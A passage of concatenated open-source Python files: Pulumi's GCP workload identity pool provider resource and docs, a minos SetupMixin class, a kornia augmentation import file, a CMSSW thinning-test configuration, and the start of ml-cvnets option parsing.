"attribute.aws_account": "assertion.account",
"attribute.environment": "assertion.arn.contains(\":instance-profile/Production\") ? \"prod\" : \"test\"",
},
aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs(
account_id="999999999999",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Oidc Basic
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
attribute_mapping={
"google.subject": "assertion.sub",
},
oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs(
issuer_uri="https://sts.windows.net/azure-tenant-id",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Oidc Full
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
display_name="Name of provider",
description="OIDC identity pool provider for automated test",
disabled=True,
attribute_condition="\"e968c2ef-047c-498d-8d79-16ca1b61e77e\" in assertion.groups",
attribute_mapping={
"google.subject": "\"azure::\" + assertion.tid + \"::\" + assertion.sub",
"attribute.tid": "assertion.tid",
"attribute.managed_identity_name": \"\"\" {
"8bb39bdb-1cc5-4447-b7db-a19e920eb111":"workload1",
"55d36609-9bcf-48e0-a366-a3cf19027d2a":"workload2"
}[assertion.oid]
\"\"\",
},
oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs(
allowed_audiences=[
"https://example.com/gcp-oidc-federation",
"example.com/gcp-oidc-federation",
],
issuer_uri="https://sts.windows.net/azure-tenant-id",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
WorkloadIdentityPoolProvider can be imported using any of these accepted formats
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default projects/{{project}}/locations/global/workloadIdentityPools/{{workload_identity_pool_id}}/providers/{{workload_identity_pool_provider_id}}
```
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{project}}/{{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}}
```
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}}
```
:param str resource_name: The name of the resource.
:param WorkloadIdentityPoolProviderArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(WorkloadIdentityPoolProviderArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
attribute_condition: Optional[pulumi.Input[str]] = None,
attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = WorkloadIdentityPoolProviderArgs.__new__(WorkloadIdentityPoolProviderArgs)
__props__.__dict__["attribute_condition"] = attribute_condition
__props__.__dict__["attribute_mapping"] = attribute_mapping
__props__.__dict__["aws"] = aws
__props__.__dict__["description"] = description
__props__.__dict__["disabled"] = disabled
__props__.__dict__["display_name"] = display_name
__props__.__dict__["oidc"] = oidc
__props__.__dict__["project"] = project
if workload_identity_pool_id is None and not opts.urn:
raise TypeError("Missing required property 'workload_identity_pool_id'")
__props__.__dict__["workload_identity_pool_id"] = workload_identity_pool_id
if workload_identity_pool_provider_id is None and not opts.urn:
raise TypeError("Missing required property 'workload_identity_pool_provider_id'")
__props__.__dict__["workload_identity_pool_provider_id"] = workload_identity_pool_provider_id
__props__.__dict__["name"] = None
__props__.__dict__["state"] = None
super(WorkloadIdentityPoolProvider, __self__).__init__(
'gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
attribute_condition: Optional[pulumi.Input[str]] = None,
attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None) -> 'WorkloadIdentityPoolProvider':
"""
Get an existing WorkloadIdentityPoolProvider resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credential are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
:param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']] aws: An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
:param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters.
:param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
:param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters.
:param pulumi.Input[str] name: The resource name of the provider as
'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'.
:param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] state: The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to
validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently
deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider.
You cannot reuse the ID of a soft-deleted provider until it is permanently deleted.
:param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
:param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _WorkloadIdentityPoolProviderState.__new__(_WorkloadIdentityPoolProviderState)
__props__.__dict__["attribute_condition"] = attribute_condition
__props__.__dict__["attribute_mapping"] = attribute_mapping
__props__.__dict__["aws"] = aws
__props__.__dict__["description"] = description
__props__.__dict__["disabled"] = disabled
__props__.__dict__["display_name"] = display_name
__props__.__dict__["name"] = name
__props__.__dict__["oidc"] = oidc
__props__.__dict__["project"] = project
__props__.__dict__["state"] = state
__props__.__dict__["workload_identity_pool_id"] = workload_identity_pool_id
__props__.__dict__["workload_identity_pool_provider_id"] = workload_identity_pool_provider_id
return WorkloadIdentityPoolProvider(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="attributeCondition")
def attribute_condition(self) -> pulumi.Output[Optional[str]]:
"""
[A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credential are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
"""
return pulumi.get(self, "attribute_condition")
@property
@pulumi.getter(name="attributeMapping")
def attribute_mapping(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi
```
"""
return pulumi.get(self, "attribute_mapping")
@property
@pulumi.getter
def aws(self) -> pulumi.Output[Optional['outputs.WorkloadIdentityPoolProviderAws']]:
"""
An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
"""
return pulumi.get(self, "aws")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for the provider. Cannot exceed 256 characters.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def disabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
"""
return pulumi.get(self, "disabled")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[str]]:
"""
A display name for the provider. Cannot exceed 32 characters.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name of the provider as
'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def oidc(self) -> pulumi.Output[Optional['outputs.WorkloadIdentityPoolProviderOidc']]:
"""
An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
"""
return pulumi.get(self, "oidc")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to
validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently
deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider.
You cannot reuse the ID of a soft-deleted provider until it is permanently deleted.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="workloadIdentityPoolId")
def workload_identity_pool_id(self) -> pulumi.Output[str]:
"""
The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_id")
@property
@pulumi.getter(name="workloadIdentityPoolProviderId")
def workload_identity_pool_provider_id(self) -> pulumi.Output[str]:
"""
The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_provider_id")
|
packages/core/minos-microservice-common/minos/common/setup.py | minos-framework/minos-python | 247 | 29767 | from __future__ import (
annotations,
)
import logging
import warnings
from pathlib import (
Path,
)
from typing import (
TYPE_CHECKING,
Optional,
Type,
TypeVar,
Union,
)
from .object import (
Object,
)
if TYPE_CHECKING:
from .config import (
Config,
)
logger = logging.getLogger(__name__)
S = TypeVar("S", bound="SetupMixin")
class SetupMixin(Object):
"""Setup Mixin class."""
def __init__(self, *args, already_setup: bool = False, **kwargs):
super().__init__(**kwargs)
self._already_setup = already_setup
@property
def already_setup(self) -> bool:
"""Already Setup getter.
:return: A boolean value.
"""
return self._already_setup
@property
def already_destroyed(self) -> bool:
"""Already Destroy getter.
:return: A boolean value.
"""
return not self._already_setup
@classmethod
def from_config(cls: Type[S], config: Optional[Union[Config, Path]] = None, **kwargs) -> S:
"""Build a new instance from config.
:param config: Config instance. If `None` is provided, default config is chosen.
:param kwargs: Additional named arguments.
:return: A instance of the called class.
"""
if isinstance(config, Path):
from .config import (
Config,
)
config = Config(config)
if config is None:
from .config import (
Config,
)
from .injections import (
Inject,
)
config = Inject.resolve(Config)
logger.info(f"Building a {cls.__name__!r} instance from config...")
return cls._from_config(config=config, **kwargs)
@classmethod
def _from_config(cls: Type[S], config: Config, **kwargs) -> S:
return cls(**kwargs)
async def __aenter__(self: S) -> S:
await self.setup()
return self
async def setup(self) -> None:
"""Setup miscellaneous repository things.
:return: This method does not return anything.
"""
if not self._already_setup:
logger.debug(f"Setting up a {type(self).__name__!r} instance...")
await self._setup()
self._already_setup = True
async def _setup(self) -> None:
return
async def __aexit__(self, exc_type, exc_value, exc_traceback):
await self.destroy()
async def destroy(self) -> None:
"""Destroy miscellaneous repository things.
:return: This method does not return anything.
"""
if self._already_setup:
logger.debug(f"Destroying a {type(self).__name__!r} instance...")
await self._destroy()
self._already_setup = False
async def _destroy(self) -> None:
"""Destroy miscellaneous repository things."""
def __del__(self):
if not getattr(self, "already_destroyed", True):
warnings.warn(
f"A not destroyed {type(self).__name__!r} instance is trying to be deleted...", ResourceWarning
)
class MinosSetup(SetupMixin):
"""Minos Setup class."""
def __init__(self, *args, **kwargs):
warnings.warn(f"{MinosSetup!r} has been deprecated. Use {SetupMixin} instead.", DeprecationWarning)
super().__init__(*args, **kwargs)
|
kornia/augmentation/_3d/intensity/__init__.py | Ishticode/kornia | 418 | 29771 | <gh_stars>100-1000
from kornia.augmentation._3d.intensity.equalize import RandomEqualize3D
from kornia.augmentation._3d.intensity.motion_blur import RandomMotionBlur3D
|
DataFormats/FWLite/test/RefTest_cfg.py | ckamtsikis/cmssw | 852 | 29779 | <reponame>ckamtsikis/cmssw<gh_stars>100-1000
# Configuration file for RefTest_t
import FWCore.ParameterSet.Config as cms
process = cms.Process("TEST")
process.load("FWCore.Framework.test.cmsExceptionsFatal_cff")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(2)
)
process.source = cms.Source("EmptySource")
process.WhatsItESProducer = cms.ESProducer("WhatsItESProducer")
process.DoodadESSource = cms.ESSource("DoodadESSource")
process.Thing = cms.EDProducer("ThingProducer",
offsetDelta = cms.int32(1)
)
process.OtherThing = cms.EDProducer("OtherThingProducer")
process.thingProducer = cms.EDProducer("ThingProducer",
offsetDelta = cms.int32(100),
nThings = cms.int32(50)
)
process.trackOfThingsProducerA = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(0, 1, 2, 3, 4, 5, 6, 7, 8)
)
process.trackOfThingsProducerB = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(0, 1, 2, 3)
)
process.trackOfThingsProducerC = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(4, 5, 6, 7)
)
process.trackOfThingsProducerD = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(10, 11, 12, 13, 14, 15, 16, 17, 18)
)
process.trackOfThingsProducerDMinus = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(10, 11, 12, 13, 14, 15, 16, 17)
)
process.trackOfThingsProducerDPlus = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(10, 11, 12, 13, 14, 15, 16, 17, 18, 21)
)
process.trackOfThingsProducerE = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(10, 11, 12, 13, 14)
)
process.trackOfThingsProducerF = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(14, 15, 16, 17)
)
process.trackOfThingsProducerG = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(20, 21, 22, 23, 24, 25, 26, 27, 28)
)
process.trackOfThingsProducerH = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(20, 21, 22, 23)
)
process.trackOfThingsProducerI = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(24, 25, 26, 27)
)
process.trackOfThingsProducerJ = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(30, 31, 32, 33, 34, 35, 36, 37, 38)
)
process.trackOfThingsProducerK = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(30, 31, 32, 33)
)
process.trackOfThingsProducerL = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(34, 35, 36, 37)
)
process.trackOfThingsProducerM = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(40, 41, 42, 43, 44, 45, 46, 47, 48)
)
process.trackOfThingsProducerN = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(40, 41, 42, 43)
)
process.trackOfThingsProducerO = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(44, 45, 46, 47)
)
process.thinningThingProducerA = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thingProducer'),
trackTag = cms.InputTag('trackOfThingsProducerA'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(50)
)
process.thinningThingProducerB = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerA'),
trackTag = cms.InputTag('trackOfThingsProducerB'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerC = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerA'),
trackTag = cms.InputTag('trackOfThingsProducerC'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerD = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thingProducer'),
trackTag = cms.InputTag('trackOfThingsProducerD'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(50)
)
process.thinningThingProducerE = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerD'),
trackTag = cms.InputTag('trackOfThingsProducerE'),
offsetToThinnedKey = cms.uint32(10),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerF = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerD'),
trackTag = cms.InputTag('trackOfThingsProducerF'),
offsetToThinnedKey = cms.uint32(10),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerG = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thingProducer'),
trackTag = cms.InputTag('trackOfThingsProducerG'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(50)
)
process.thinningThingProducerH = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerG'),
trackTag = cms.InputTag('trackOfThingsProducerH'),
offsetToThinnedKey = cms.uint32(20),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerI = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerG'),
trackTag = cms.InputTag('trackOfThingsProducerI'),
offsetToThinnedKey = cms.uint32(20),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerJ = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thingProducer'),
trackTag = cms.InputTag('trackOfThingsProducerJ'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(50)
)
process.thinningThingProducerK = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerJ'),
trackTag = cms.InputTag('trackOfThingsProducerK'),
offsetToThinnedKey = cms.uint32(30),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerL = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerJ'),
trackTag = cms.InputTag('trackOfThingsProducerL'),
offsetToThinnedKey = cms.uint32(30),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerM = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thingProducer'),
trackTag = cms.InputTag('trackOfThingsProducerM'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(50)
)
process.thinningThingProducerN = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerM'),
trackTag = cms.InputTag('trackOfThingsProducerN'),
offsetToThinnedKey = cms.uint32(40),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerO = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerM'),
trackTag = cms.InputTag('trackOfThingsProducerO'),
offsetToThinnedKey = cms.uint32(40),
expectedCollectionSize = cms.uint32(9)
)
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('goodDataFormatsFWLite.root'),
outputCommands = cms.untracked.vstring(
'keep *',
'drop *_thingProducer_*_*',
'drop *_thinningThingProducerD_*_*',
'drop *_thinningThingProducerH_*_*',
'drop *_thinningThingProducerI_*_*',
'drop *_thinningThingProducerJ_*_*',
'drop *_thinningThingProducerK_*_*',
'drop *_thinningThingProducerL_*_*',
'drop *_thinningThingProducerM_*_*',
'drop *_thinningThingProducerN_*_*',
)
)
process.out2 = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('good2DataFormatsFWLite.root')
)
process.out_other = cms.OutputModule("PoolOutputModule",
outputCommands = cms.untracked.vstring('drop *',
'keep edmtestOtherThings_*_*_*',
'keep *_TriggerResults_*_*'),
fileName = cms.untracked.string('other_onlyDataFormatsFWLite.root')
)
process.thinningTestPath = cms.Path(process.thingProducer
* process.trackOfThingsProducerA
* process.trackOfThingsProducerB
* process.trackOfThingsProducerC
* process.trackOfThingsProducerD
* process.trackOfThingsProducerDMinus
* process.trackOfThingsProducerDPlus
* process.trackOfThingsProducerE
* process.trackOfThingsProducerF
* process.trackOfThingsProducerG
* process.trackOfThingsProducerH
* process.trackOfThingsProducerI
* process.trackOfThingsProducerJ
* process.trackOfThingsProducerK
* process.trackOfThingsProducerL
* process.trackOfThingsProducerM
* process.trackOfThingsProducerN
* process.trackOfThingsProducerO
* process.thinningThingProducerA
* process.thinningThingProducerB
* process.thinningThingProducerC
* process.thinningThingProducerD
* process.thinningThingProducerE
* process.thinningThingProducerF
* process.thinningThingProducerG
* process.thinningThingProducerH
* process.thinningThingProducerI
* process.thinningThingProducerJ
* process.thinningThingProducerK
* process.thinningThingProducerL
* process.thinningThingProducerM
* process.thinningThingProducerN
* process.thinningThingProducerO
)
process.p = cms.Path(process.Thing*process.OtherThing)
process.outp = cms.EndPath(process.out*process.out2*process.out_other)
|
options/opts.py | apple/ml-cvnets | 209 | 29794 | #
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
import argparse
from typing import Optional
from data.sampler import arguments_sampler
from data.collate_fns import arguments_collate_fn
from options.utils import load_config_file
from data.datasets import arguments_dataset
from cvnets import arguments_model, arguments_nn_layers, arguments_ema
from cvnets.anchor_generator import arguments_anchor_gen
from loss_fn import arguments_loss_fn
from optim import arguments_optimizer
from optim.scheduler import arguments_scheduler
from common import SUPPORTED_MODALITIES
from data.transforms import arguments_augmentation
from metrics import arguments_stats
from data.video_reader import arguments_video_reader
from cvnets.matcher_det import arguments_box_matcher
from utils import logger
class ParseKwargs(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
namespace_dict = vars(namespace)
if len(values) > 0:
override_dict = {}
# values are list of key-value pairs
for value in values:
key = None
try:
key, value = value.split("=")
except ValueError as e:
logger.error(
"For override arguments, a key-value pair of the form key=value is expected"
)
if key in namespace_dict:
value_namespace = namespace_dict[key]
if value_namespace is None and value is None:
value = None
elif value_namespace is None and value is not None:
# possibly a string or list of strings or list of integers
# check if string is a list or not
value = value.split(",")
if len(value) == 1:
# its a string
value = str(value[0])
# check if its empty string or not
if value == "" or value.lower() == "none":
value = None
else:
